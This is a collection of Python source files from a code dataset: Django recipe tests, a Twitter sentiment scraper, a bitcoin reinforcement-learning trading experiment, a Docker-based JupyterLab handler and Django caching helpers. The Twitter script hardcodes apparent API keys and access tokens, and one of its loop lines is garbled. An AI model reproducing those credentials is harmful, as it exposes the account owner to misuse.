\"-ob\") \n\tplt.grid()\n\t# plt.show()\n\tfilename = os.path.join(save_path, \"rssi_vs_distance_\" + str(beaconNo))\n\tplt.savefig(filename, dpi=200, bbox_inches='tight')\n\tplt.close()","sub_path":"BTP/CC Lab/WKNN/rssi_vs_distance_graph.py","file_name":"rssi_vs_distance_graph.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"510989694","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.test import TestCase\nfrom cooking.models.Recipe import Recipe\nfrom cooking.tests import util\n\n__author__ = 'sarace'\n\n\nclass RecipeMethodsTests(TestCase):\n\n def test_create_recipe(self):\n \"\"\"\n Test the creation of a recipe\n :return:\n \"\"\"\n util.create_test_recipe()\n new_recipe = Recipe.objects.get(name='Tarte Tatin')\n self.assertTrue(new_recipe.id is not None)\n self.assertTrue(new_recipe.global_time == 55)\n self.assertTrue(new_recipe.preparation_time == 15)\n self.assertTrue(new_recipe.costs == 1)\n self.assertTrue(new_recipe.user_mod == 'user_test')\n self.assertTrue(new_recipe.num_people == 6)\n\n def test_update_recipe(self):\n \"\"\"\n Update a recipe, save it and test if the changes were done.\n :return:\n \"\"\"\n recipe = util.create_test_recipe()\n old_recipe_id = recipe.id\n old_recipe_global_time = recipe.global_time\n recipe.global_time = 60\n recipe.save()\n new_recipe = Recipe.objects.get(name='Tarte Tatin')\n self.assertTrue(old_recipe_id == new_recipe.id)\n self.assertFalse(old_recipe_global_time == new_recipe.global_time)\n\n\n def test_delete_recipe(self):\n with self.assertRaises(ObjectDoesNotExist):\n \"\"\"\n Delete a recipe and check if it is not anymore in the DB\n :return:\n \"\"\"\n recipe = util.create_test_recipe()\n recipe_id = recipe.id\n recipe.delete()\n deleted_recipe = Recipe.objects.get(pk=recipe_id)\n","sub_path":"cooking/tests/RecipeTests.py","file_name":"RecipeTests.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"386609711","text":"import time, csv, sys, io, re\nimport twitter\nfrom textblob import TextBlob\ntry:\n\tpass\nexcept:\n\tprint(\"ERROR MESSAGE:\")\n\tprint(\"You should have twitter-pyton api installed.\")\n\tprint(\"You should have textblob api installed.\")\n\tprint(\"You should have csv api installed.\")\n\tprint(\"You should have io api installed.\")\n\tprint(\"You should have re api installed.\")\n\tprint(\"You should have time api installed.\")\n\ndef clean_tweet(string):\n\t# Turns out that Text blob handles emoticons for sentiment analysis as well.\n\t# So there is no need to replace emoticons.\n\t#cleaning tweets for some well known abbreviations and removing special characters.\n\t#removing hyperlinks as well as Twitter is attaching the Tweet link after the Tweet text.\n\tstring = re.sub(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', '', string)\n\tstring = re.sub(r'\\bthats\\b', 'that is', string)\n\tstring = re.sub(r'\\bive\\b', 'i have', string)\n\tstring = re.sub(r'\\bim\\b', 'i am', string)\n\tstring = re.sub(r'\\bya\\b', 'yeah', string)\n\tstring = re.sub(r'\\bcant\\b', 'can not', string)\n\tstring = re.sub(r'\\bwont\\b', 'will not', string)\n\tstring = re.sub(r'\\bid\\b', 'i would', string)\n\tstring = re.sub(r'wtf', 'what the fuck', string)\n\tstring = re.sub(r'\\bwth\\b', 'what the hell', string)\n\tstring = re.sub(r'\\br\\b', 'are', string)\n\tstring = re.sub(r'\\bu\\b', 'you', string)\n\tstring = re.sub(r'\\bk\\b', 'OK', string)\n\tstring = re.sub(r'\\bsux\\b', 'sucks', string)\n\tstring = re.sub(r'\\bno+\\b', 'no', string)\n\tstring = re.sub(r'\\bcoo+\\b', 'cool', string)\n\t#no need to remove emoticons\n\t#string = re.sub(r'\\b:\\)\\b', 'good', string)\n\t#string = re.sub(r'\\b:D\\b', 'good', string)\n\t#string = re.sub(r'\\b:\\(\\b', 'sad', string)\n\t#string = re.sub(r'\\b:-\\)\\b', 'good', string)\n\t#string = re.sub(r'\\b=\\)\\b', 'good', string)\n\t#string = re.sub(r'\\b\\(:\\b', 'good', string)\n\t#string = re.sub(r'\\b:\\\\\\b', 'annoyed', string)\n\treturn string\n\n#Python has some serious problems with non ascii characters.\ndef strip_non_ascii(string):\n\t#removing the non ascii characters from the string because Python has a lot of encoding problems\n\t''' Returns the string without non ASCII characters'''\n\tstripped = (c for c in string if 0 < ord(c) < 127)\n\treturn ''.join(stripped)\n\n#TO get the runtime of the program, can be ignored.\nstart_time = time.time()\n#Access keys for the Twitter API\nconsumer_key = 'DGh9KwPCvFwmOGHoBajHaCEIP'\nconsumer_secret = 'h5nGxUW36rKDYyXJF2bJRHafLOmPwOO6hPqWAraDNMh3j0DUWc'\naccess_token = '963536281165803520-NQzBRAIa13bjmIYd2cEmgDKqgvFY3JP'\naccess_secret = 'lp2Hu3FOdJ5Z563Isb7VCUtTk2UwH03LLummrYskunnd3'\n\n#40.7127° N, -74.0134° W One World Trade Center\n#37.8199° N, -122.4783° W Golden Gate Bridge\n#Getting the Latitude and Longitude from Google Places API\noutfile = \"tweets.csv\"\nlatitude = 37.8199\nlongitude = -122.4783\nkm_range = 1000\nnum_results = 100\n\n#auth = OAuthHandler(consumer_key, consumer_secret)\n#auth.set_access_token(access_token, access_secret)\n\n#twitter = Twitter(\n#\tauth = OAuth(access_token, access_secret, consumer_key, consumer_secret)) \n#Authentication for the Twitter API\ntry:\n\tapi = twitter.Api(consumer_key, consumer_secret, access_token, access_secret)\nexcept:\n\tprint(\"ERROR MESSAGE: \")\n\tprint(\"Authentication Failed. Do something!!!!\")\n\n#INdexing and opening the CSV file to store the tweets in\n#Stream API can also work.\ntry:\n\tindexer = [\"User\", \"Tweet\", \"Latitude\", \"Longitude\", \"Sentiment\", \"ID\"]\n\tcsvfile = open(outfile,\"w\")\n\tcsvwriter = csv.writer(csvfile)\n\tcsvwriter.writerow(indexer)\nexcept:\n\tprint(\"ERROR MESSAGE: \")\n\tprint(\"cannot open the csv file to save the tweets.\")\n\n#Main Program starts here,\n#api = tweepy.API(auth)\n#for status in tweepy.Cursor(api.home_timeline).items(100):\n # with io.open(\"lol.txt\", \"w+\", encoding = 'utf-8') as f:\n # \tf.write(status.text)\n#f.close()\ntry:\n\tglobal last_id\n\tresult_count= 0\n\tlast_id = None\n\tquery = api.GetSearch(geocode = (latitude, longitude, \"100mi\"), count=512, max_id = last_id)\n\tprint(len(query))\nexcept: \n\tprint(\"ERROR MESSAGE: \")\n\tprint(\"Not able to query the twitter API. \")\n\tprint(\"Check Connection.\")\n#total count is the number of tweets we have\n#needed_tweets is the number of tweets we need\n#we call the api until we get the amount of tweets that we need.\ntotal_count = 1\nneeded_tweets = 1000\nwhile(total_count= 0.1:\n\t\t\tpolarity = 'positive'\n\t\telif setup <= -0.1:\n\t\t\tpolarity = 'negative'\n\t\telse:\n\t\t\tpolarity = 'neutral'\n\t\t#print(polarity)\n\t\t#last_id gets the last ID of the tweet that was found in the last iteration\n\t\tif(not(last_id)):\n\t\t\tlast_id = result.id\n\t\telse:\n\t\t\tlast_id = min(result.id, last_id)\n\t\t#we use last ID so that we do not get past tweets again and again\n\t\tID = result.id\n\t\t#print(str(last_id) +\"\t + str(ID))\n\t\trow = [user, ans, latitude, longitude, polarity, ID]\n\t\tcsvwriter.writerow(row)\n\t\t#Still getting same tweets again and again.\n\t\t#Twitter API is not giving access to old tweets I suppose. Maybe the result of a Standard Licence API?\n\t\t#print(result.full_text)\n\t\t#if(result[\"geo\"]):\n\t\t#\tuser = result[\"user\"][\"screen_name\"]\n\t\t#\ttext = result[\"text\"]\n\t\t#\tt=text\n\t\t#\ttext = str(t)\n\t\t#\tlatituded = result[\"geo\"][\"coordinates\"][0]\n\t\t#\tlongituded = result[\"geo\"][\"coordinates\"][1\n\t\t#\t#-----------------------------------------------------------------------\n\t\t#\t# now write this row to our CSV file\n\t\t\t#-----------------------------------------------------------------------\n\t\t#\trow = [ user, text, latituded, longituded[] ]\n\t\t#\tcsvwriter.writerow(row)\n\t\t#\tresult_count += 1\n\t\t#\tlast_id = result[\"id\"]\n\t\t#print(\"%d tweets received as of now\"%(count))\n\t#total_count+=count\n\t#print(\"%d is the total amount of tweets received.\"%(total_count))\ncsvfile.close()\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n\n\n\n#[6918 rows x 3 columns]\n#Accuracy 0.837236195432\n#Precision 0.894869638352","sub_path":"other/Tweet_Sentiment.py","file_name":"Tweet_Sentiment.py","file_ext":"py","file_size_in_byte":6246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"134819001","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as md\nimport sys\n\nsys.path.insert(0, \"../../../Data/src/ReadData\")\nimport RRL as RRL\nimport regDataSets as data\nimport dataProcessing as proc\n\n\n# parameters\ndataPath = \"../../../Data/\"\nfileName = dataPath + \"bcEUR.csv.gz\"\n\nstartTimes = [9.46771200e+08, 1.4005e9]\nendTimes = [1.4e9, 1.431e9]\n\nsmoothWindow = 30\ntimeScale = 3\n\nNtrain = 1\nNderivs = 2 \t\t\t# consider past point in decision\ntimePerBin = 500 \t# number of seconds per bin\ntrainSteps = 500\nNtimeBins_train = 20\nNtimeBins_test = 20\nlearningRate = .7\nLRdecay = 0.8\nreg = 0.0\n\nfee = 0.0025\n\n\n####\tImport Data ####\ndataSets = data.importData(fileName, startTimes, endTimes)\n\n# Rebin the data\nprint(len(dataSets))\ntime_train, price_train = proc.binner(dataSets[0], timePerBin, NtimeBins_train)\ntime_test, price_test = proc.binner(dataSets[1], timePerBin, NtimeBins_test)\n\n# Final price array to be used\nX_train = proc.smoother(time_train, price_train, smoothWindow, timeScale)\nX_test = proc.smoother(time_test, price_test, smoothWindow, timeScale)\n\n# Indicator (+-1) of the price from n-1 to n at index n\nY_train = data.getYvalues(X_train)\nY_test = data.getYvalues(X_test)\n\n# BTC price change rate between NN bins\nbtcRate_train = np.zeros(NtimeBins_train - 1 - Nderivs)\nbtcRate_test = np.zeros(NtimeBins_test - 1 - Nderivs)\n \nfor itm in range(Nderivs+1, NtimeBins_test):\n btcRate_test[itm-1-Nderivs] = X_test[itm]/X_test[itm-1] - 1.0\n\nfor itm in range(Nderivs+1, NtimeBins_train):\n btcRate_train[itm-1-Nderivs] = X_train[itm]/X_train[itm-1] - 1.0\n\n\n#### Make Features ####\n\n# Calculate derivatives\nderivs_train = RRL.derivatives(X_train, Nderivs)\nderivs_test = RRL.derivatives(X_test, Nderivs)\n\nfeatures_train = derivs_train\nfeatures_test = derivs_test\n\n#### Resize ####\ntime_train = time_train[Nderivs+1:-1]\nprice_train = price_train[Nderivs+1:-1]\ntime_test = time_test[Nderivs+1:-1]\nprice_test = price_test[Nderivs+1:-1]\n\nX_train = X_train[Nderivs+1:-1]\nX_test = X_test[Nderivs+1:-1]\nY_train = Y_train[Nderivs+1:-1]\nY_test = Y_test[Nderivs+1:-1]\n\nfeatures_train = features_train[:-1]\nfeatures_test = features_test[:-1]\n\n\n###########################\n#### Train The Model ####\n###########################\n\ntheta = np.zeros(np.size(features_train,1))\nwealth_train = np.zeros(np.size(features_train,0))\n\n#### Training ####\nfor itm in range(1, Ntrain+1):\n theta = RRL.RRLearning(features_train, theta, learningRate, btcRate_train, fee)\n learningRate = learningRate*LRdecay\n\n#### Calculate Profit ####\ncorrectRate = 0;\nbuyThresh = 0\nsellThresh = 0\nprofit_train = np.zeros(np.size(features_train, 0))\nprofit_train[0] = 1.\nFarr_train = np.zeros(np.size(features_train, 0))\nfor itm in range(0,np.size(features_train, 0)):\n Farr_train[itm] = (1.0 + np.tanh(np.dot(theta, features_train[itm,:])))/2.0\n\nfor itm in range(1, np.size(features_train, 0)):\n correctRate += (np.sign(Y_train[itm]*(Farr_train[itm] - 0.5)) + 1.0)/2.0\n profit_train[itm] = profit_train[itm-1]*(1.0 + Farr_train[itm]*btcRate_train[itm])*(1.0 - fee*np.abs(Farr_train[itm] - Farr_train[itm-1]))\n\nprint(\"!!!!! TRAINING RESULTS !!!!!\")\nprint(\" log profit of \" + str(profit_train[np.size(features_train, 0)-1]))\n\ncorrectRate = (correctRate/np.size(features_train, 0))\nprint(\" correct rate: \" + str(correctRate))\n\n\n##########################\n#### Test The Model ####\n##########################\n\ncorrectRate = 0\nprofit_test = np.zeros(np.size(features_test, 0))\nprofit_test[0] = 1.0\n\nFarr_test = np.zeros(np.size(features_test,0))\nfor itm in range(0,np.size(features_test,0)):\n Farr_test[itm] = (1.0 + np.tanh(np.dot(theta, features_test[itm,:])))/2.0\n\nfor itm in range(1, np.size(features_test,0)):\n correctRate += (np.sign(Y_test[itm]*(Farr_test[itm] - 0.5)) + 1.0)/2.0\n profit_test[itm] = profit_test[itm-1]*(1.0 + Farr_test[itm]*btcRate_test[itm])*(1.0 - fee*np.abs(Farr_test[itm] - Farr_test[itm-1]))\n\ncorrectRate = (correctRate/np.size(features_test, 0))\n\nprint(\"!!!!! TESTING RESULTS !!!!!\")\nprint(\" log test profit of \" + str(profit_test[np.size(features_test, 0) - 1]))\nprint(\" correct rate: \" + str(correctRate))\n\nprint(\"\\n\\nFinal test/train cumulative weighted confidence\\n\"\n +\"\\t\"+str(profit_test[-1])+\" / \"+str(profit_train[-2])+\" \"\n +str(np.log10(profit_test[-1]))+\" / \"+str(np.log10(profit_train[-2])));\n\n\n########################\n#### Plot Results ####\n########################\n\nfig, ax = plt.subplots(figsize=(7,5))\n\ntime_train /= 86400\ntime_test /= 86400\n\nprint(time_train.shape, profit_train.shape)\ntplt1, = ax.plot(time_train, profit_train, 'b', label='Train', linewidth=2.5)\ntplt2, = ax.plot(time_test, profit_test, 'k', label='Test', linewidth=2.5)\nax.set_xlabel('Time [days]', fontweight='bold')\nax.set_ylabel('Cumulative Weighted Confidence', fontweight='bold')\nax.semilogy()\n\nlgnd = ax.legend(handles=[tplt1, tplt2], title='Recurrent RL', loc='lower right', fancybox=True)\nplt.setp(lgnd.get_title(), fontsize='large', fontweight='bold')\nax.grid()\nplt.show()\nfig.savefig(\"rrlTestvTrain.png\", format='png')\n\n","sub_path":"Learning/src/RRL/run_RRL.py","file_name":"run_RRL.py","file_ext":"py","file_size_in_byte":5084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"507069013","text":"from utils.logger import TermLogger,AverageMeter\nfrom validation import val\nfrom train import train\nimport time\ndef main():\n '''\n TermLogger demo\n 训练框架\n :return:\n '''\n epochs = 15\n train_size=10#batchs for train\n valid_size = 6\n\n logger = TermLogger(n_epochs=epochs,\n train_size=train_size,\n valid_size=valid_size)\n logger.reset_epoch_bar()\n\n\n #first val\n first_val = True\n val_losses = AverageMeter(precision=3)\n if first_val:\n val_names,val_losses = val(logger)\n else:\n val_loss = 0\n\n logger.reset_epoch_bar()\n #logger.epoch_logger_update(epoch=0,display)\n\n logger.epoch_bar.update(epoch=0)\n logger.epoch_writer.write('---\\n---\\n---')\n epoch_time = AverageMeter()\n\n\n\n end = time.time()\n for epoch in range(1,epochs):\n\n train_names,train_losses=train(logger)\n\n val_names,val_losses=val(logger)\n\n epoch_time.update(time.time()-end)\n end = time.time()\n\n\n logger.reset_train_bar()\n logger.reset_valid_bar()\n\n #if log_terminal\n logger.epoch_logger_update(epoch=epoch,time=epoch_time,names=val_names,values=val_losses)\n\n logger.epoch_bar.finish()\n print('over')\nif __name__ =='__main__':\n main()","sub_path":"tutorials/train_val_framework/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"120555068","text":"'''\nCreated on 12 Feb, 2020\n\n@author: Tim Kreuzer\n'''\n\nimport subprocess\n\nfrom flask import request\nfrom flask_restful import Resource\nfrom flask import current_app as app\n\nfrom app import utils_common, utils_file_loads, jlab_utils\nimport os\nfrom pathlib import Path\n\nclass JupyterLabHandler(Resource):\n def get(self):\n try:\n \"\"\"\n Headers:\n Intern-Authorization: spawner_token\n uuidcode\n Containername: uuidcode_from_spawn \n \"\"\"\n # Track actions through different webservices.\n uuidcode = request.headers.get('uuidcode', '')\n app.log.info(\"uuidcode={} - Get JupyterLab Status\".format(uuidcode))\n app.log.trace(\"uuidcode={} - Headers: {}\".format(uuidcode, request.headers))\n \n # Check for the J4J intern token\n utils_common.validate_auth(app.log,\n uuidcode,\n request.headers.get('intern-authorization', None))\n \n request_headers = {}\n for key, value in request.headers.items():\n if 'Token' in key: # refresh, jhub, access\n key = key.replace('-', '_')\n request_headers[key.lower()] = value\n containername = request_headers.get(\"containername\")\n cmd1 = [\"docker\", \"ps\", \"-q\", \"-f\", \"name={}\".format(containername)]\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd1))\n ret = subprocess.check_output(cmd1, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.exception(\"uuidcode={} - Could not check docker status. Return True\".format(uuidcode))\n return \"True\", 200\n if ret == \"\":\n return \"False\", 200\n else:\n cmd2 = [\"docker\", \"ps\", \"-aq\", \"-f\", \"status=exited\", \"-f\", \"name={}\".format(containername)]\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd2))\n ret = subprocess.check_output(cmd2, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.exception(\"uuidcode={} - Could not check docker status. Return True\".format(uuidcode))\n return \"True\", 200\n if ret == \"\":\n # it's running\n return \"True\", 200\n else:\n # cleanup. Container status=exited\n cmd3 = [\"docker\", \"rm\", containername]\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd3))\n ret = subprocess.check_output(cmd3, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.exception(\"uuidcode={} - Could not cleanup non running container. Return False\".format(uuidcode))\n return \"False\", 200\n return \"False\", 200\n except:\n app.log.exception(\"JLab.get failed. Bugfix required\")\n return '', 500\n\n def post(self):\n try:\n \"\"\"\n Headers:\n Intern-Authorization: spawner_token\n uuidcode\n accesstoken\n expire\n Body:\n email\n environments\n image\n port\n servername\n jupyterhub_api_url\n Config:\n basefolder # /etc/j4j/j4j_hdfcloud\n network\n cap-add\n memory\n memory-swap\n device\n storage-opt \n \"\"\"\n # Track actions through different webservices.\n uuidcode = request.headers.get('uuidcode', '')\n app.log.info(\"uuidcode={} - Start JupyterLab\".format(uuidcode))\n app.log.trace(\"uuidcode={} - Headers: {}\".format(uuidcode, request.headers))\n app.log.trace(\"uuidcode={} - Json: {}\".format(uuidcode, request.json))\n \n # Check for the J4J intern token\n utils_common.validate_auth(app.log,\n uuidcode,\n request.headers.get('intern-authorization', None))\n \n request_headers = {}\n for key, value in request.headers.items():\n if 'Token' in key: # refresh, jhub, access\n key = key.replace('-', '_')\n request_headers[key.lower()] = value\n request_json = {}\n for key, value in request.json.items():\n if 'Token' in key: # refresh, jhub, access\n key = key.replace('-', '_')\n request_json[key.lower()] = value\n app.log.trace(\"uuidcode={} - New Headers: {}\".format(uuidcode, request_headers))\n app.log.trace(\"uuidcode={} - New Json: {}\".format(uuidcode, request_json))\n \n if \"SERVICELEVEL\" in request_json.get(\"envrionments\", {}).keys():\n config = utils_file_loads.get_servicelevel_config(request_json.get(\"environments\", {}).get(\"SERVICELEVEL\", \"default\"))\n else:\n config = utils_file_loads.get_general_config()\n basefolder = config.get('basefolder', '')\n userfolder = os.path.join(basefolder, request_json.get('email').replace(\"@\", \"_at_\"))\n serverfolder = Path(os.path.join(userfolder, '.{}'.format(uuidcode)))\n mounts = jlab_utils.get_mounts(app.log, uuidcode, serverfolder, userfolder)\n \n cmd = [\"timeout\", \"{}\".format(config.get('timeout', '30d')), \"docker\", \"run\"]\n cmd.append(\"--network\")\n cmd.append(config.get(\"network\"))\n cmd.append(\"--cap-add\")\n cmd.append(config.get(\"cap-add\"))\n cmd.append(\"--memory\")\n cmd.append(config.get(\"memory\"))\n cmd.append(\"--memory-swap\")\n cmd.append(config.get(\"memory-swap\"))\n cmd.append(\"--device\")\n cmd.append(config.get(\"device\"))\n cmd.append(\"--storage-opt\")\n cmd.append(config.get(\"storage-opt\"))\n cmd.append(\"--name\")\n cmd.append(uuidcode)\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"HPCACCOUNTS\", request_json.get(\"environments\",{}).get(\"HPCACCOUNTS\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"JUPYTERHUB_API_URL\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_API_URL\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"JUPYTERHUB_CLIENT_ID\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_CLIENT_ID\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"JUPYTERHUB_API_TOKEN\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_API_TOKEN\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"JUPYTERHUB_USER\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_USER\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"JUPYTERHUB_SERVICE_PREFIX\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_SERVICE_PREFIX\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"JUPYTERHUB_BASE_URL\", request_json.get(\"environments\",{}).get(\"JUPYTERHUB_BASE_URL\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"UNITYJSCACCESSTOKEN\", request.headers.get(\"accesstoken\", \"\")))\n cmd.append(\"-e\")\n cmd.append(\"{}={}\".format(\"UNITYJSCACCESSTOKENEXPIRATION\", request.headers.get(\"expire\", \"\")))\n cmd.extend(mounts)\n cmd.append(request_json.get(\"image\"))\n cmd.append(\"/home/jovyan/.start.sh\")\n cmd.append(str(request_json.get(\"port\")))\n cmd.append(request_json.get(\"servername\"))\n cmd.append(request_json.get(\"jupyterhub_api_url\"))\n #if request_json.get(\"service\", \"\").lower() == \"dashboard\":\n # cmd.append(request_json.get())\n cmd.append(\"&\")\n app.log.debug(\"uuidcode={} - Run Command: {}\".format(uuidcode, cmd))\n subprocess.Popen(cmd)\n except:\n app.log.exception(\"JLab.post failed. Bugfix required\")\n return \"\", 500\n return \"\", 202\n\n def delete(self):\n \"\"\"\n Headers:\n Intern-Authorization: spawner_token\n uuidcode\n containername: uuidcode from spawn\n \"\"\"\n try:\n # Track actions through different webservices.\n uuidcode = request.headers.get('uuidcode', '')\n app.log.info(\"uuidcode={} - Delete JupyterLab\".format(uuidcode))\n app.log.trace(\"uuidcode={} - Headers: {}\".format(uuidcode, request.headers))\n \n # Check for the J4J intern token\n utils_common.validate_auth(app.log,\n uuidcode,\n request.headers.get('intern-authorization', None))\n request_headers = {}\n for key, value in request.headers.items():\n if 'Token' in key: # refresh, jhub, access\n key = key.replace('-', '_')\n request_headers[key.lower()] = value \n containername = request_headers.get('containername')\n cmd1 = [\"docker\", \"container\", \"exec\", containername, \"/bin/umount\", \"/home/jovyan/B2DROP\"]\n cmd2 = [\"docker\", \"container\", \"exec\", containername, \"/bin/fusermount\", \"-u\", \"/home/jovyan/HPCMOUNT\"]\n cmd3 = [\"docker\", \"container\", \"rm\", \"--force\", containername]\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd1))\n ret = subprocess.check_output(cmd1, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.warning(\"uuidcode={} - Could not unmount B2DROP\".format(uuidcode))\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd2))\n ret = subprocess.check_output(cmd2, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.warning(\"uuidcode={} - Could not unmount HPCMOUNT\".format(uuidcode))\n try:\n app.log.trace(\"uuidcode={} - Cmd: {}\".format(uuidcode, cmd3))\n ret = subprocess.check_output(cmd3, stderr=subprocess.STDOUT, timeout=5)\n ret = ret.strip().decode(\"utf-8\")\n app.log.trace(\"uuidcode={} - Output: {}\".format(uuidcode, ret))\n except:\n app.log.exception(\"uuidcode={} - Could not stop container\".format(uuidcode))\n \n except:\n app.log.exception(\"JLabs.delete failed. Bugfix required\")\n return '', 500\n return '', 202\n","sub_path":"app/jlab.py","file_name":"jlab.py","file_ext":"py","file_size_in_byte":11688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"350185766","text":"import datetime\nfrom django.conf import settings\nfrom django.utils import timezone\nimport os\n\nfrom eulfedora.views import datastream_etag\nfrom eulfedora.server import Repository\nfrom eulfedora.util import RequestFailed\n\nfrom readux.annotations.models import Annotation\nfrom readux.books.models import Volume, VolumeV1_0, Page, PageV1_0\nfrom readux.utils import solr_interface, md5sum\n\n'''\nConditional methods for calculating last modified time and ETags\nfor view methods in :mod:`readux.books.views`.\n\n.. Note::\n\n In many cases, the Solr indexing timestamp is used rather than the object\n modification time, as this may account for changes to the site or indexing\n (including adding pages to a volume that is otherwise unchanged).\n'''\n\n\ndef volumes_modified(request, *args, **kwargs):\n 'last modification time for all volumes'\n solr = solr_interface()\n results = solr.query(content_model=VolumeV1_0.VOLUME_CONTENT_MODEL) \\\n .sort_by('-timestamp').field_limit('timestamp')\n # NOTE: using solr indexing timestamp instead of object last modified, since\n # if an object's index has changed it may have been modified\n\n # if user is logged in, changes in annotation totals result\n # in volume page display modifications\n latest_note = None\n if request.user.is_authenticated():\n latest_note = Annotation.objects.visible_to(request.user) \\\n .last_created_time()\n\n solrtime = results[0]['timestamp'] if results.count() else None\n return solrtimestamp_or_datetime(solrtime, latest_note)\n\n\ndef volume_modified(request, pid):\n 'last modification time for a single volume'\n solr = solr_interface()\n results = solr.query(content_model=VolumeV1_0.VOLUME_CONTENT_MODEL,\n pid=pid) \\\n .sort_by('-timestamp').field_limit('timestamp')\n # NOTE: using solr indexing timestamp instead of object last modified, since\n # if an object's index has changed it may have been modified,\n # and index timestamp for a volume will be updated when pages are added\n\n # if a user is logged in, page should show as modified\n # when annotation count changes\n latest_note = None\n if request.user.is_authenticated():\n # NOTE: shouldn't be very expensive to init volume here; not actually\n # making any api calls, just using volume to get volume\n # uri and associated annotations\n repo = Repository()\n vol = repo.get_object(pid, type=Volume)\n # newest annotation creation for pages in this volume\n latest_note = vol.annotations().visible_to(request.user) \\\n .last_created_time()\n\n solrtime = results[0]['timestamp'] if results.count() else None\n return solrtimestamp_or_datetime(solrtime, latest_note)\n\n\ndef volume_pages_modified(request, pid):\n '''Last modification time for a single volume or its pages, or for\n any annotations of those pages.'''\n solr = solr_interface()\n repo = Repository()\n vol = repo.get_object(pid, type=Volume)\n\n # NOTE: some overlap with Volume find_solr_pages method...\n results = solr.query((solr.Q(content_model=Volume.VOLUME_CMODEL_PATTERN) & solr.Q(pid=pid)) | \\\n (solr.Q(content_model=Page.PAGE_CMODEL_PATTERN) & solr.Q(isConstituentOf=vol.uri))) \\\n .sort_by('-timestamp').field_limit('timestamp')\n\n # NOTE: using solr indexing timestamp instead of object last modified, since\n # if an object's index has changed it may have been modified,\n # and index timestamp for a volume will be updated when pages are added\n\n # Page could also be modified based on annotations of the pages.\n # We only show total counts per page, so might not be modified if the\n # total number has not changed, but simplest just to get last modification\n # date in case of changes.\n # Note that this does NOT account for annotation deletions.\n\n # if a user is logged in, page should show as modified\n # based on annotations\n # Only displaying annotation *count* so creation time should\n # be sufficient. (Does not take into account deletions...)\n latest_note = None\n if request.user.is_authenticated():\n # get annotations for pages in this volume\n try:\n latest_note = vol.annotations().visible_to(request.user) \\\n .last_created_time()\n except Annotation.DoesNotExist:\n # no notes for this volume\n pass\n\n solrtime = results[0]['timestamp'] if results.count() else None\n return solrtimestamp_or_datetime(solrtime, latest_note)\n\n\ndef page_modified(request, vol_pid, pid):\n 'last modification time for a single page'\n solr = solr_interface()\n # TODO: use volume pid in query\n results = solr.query(content_model=PageV1_0.PAGE_CONTENT_MODEL,\n pid=pid) \\\n .sort_by('-timestamp').field_limit('timestamp')\n\n # if user is logged in, page should show as modified\n # when annotations have changed\n latest_note = None\n if request.user.is_authenticated():\n # last update for annotations on this volume, if any\n repo = Repository()\n page = repo.get_object(pid, type=Page)\n latest_note = page.annotations().visible_to(request.user) \\\n .last_updated_time()\n\n solrtime = results[0]['timestamp'] if results.count() else None\n return solrtimestamp_or_datetime(solrtime, latest_note)\n\n\ndef solrtimestamp_or_datetime(solrtime, othertime):\n # Compare and return the more recent of a solr timestamp or an\n # annotation datetime.\n\n # convert solr timestamp to timezone-aware for comparison;\n # return the most recent of the two\n # FIXME: assuming solr stores as UTC, confirm this\n if solrtime is not None and othertime is not None:\n solrtime = timezone.make_aware(solrtime, timezone.utc)\n return max(solrtime, othertime)\n\n # if both are not set, return solr time if present\n if solrtime is not None:\n return solrtime\n\n # if nothing has been returned, return other time (could be None)\n return othertime\n\n\nbooks_models_filename = 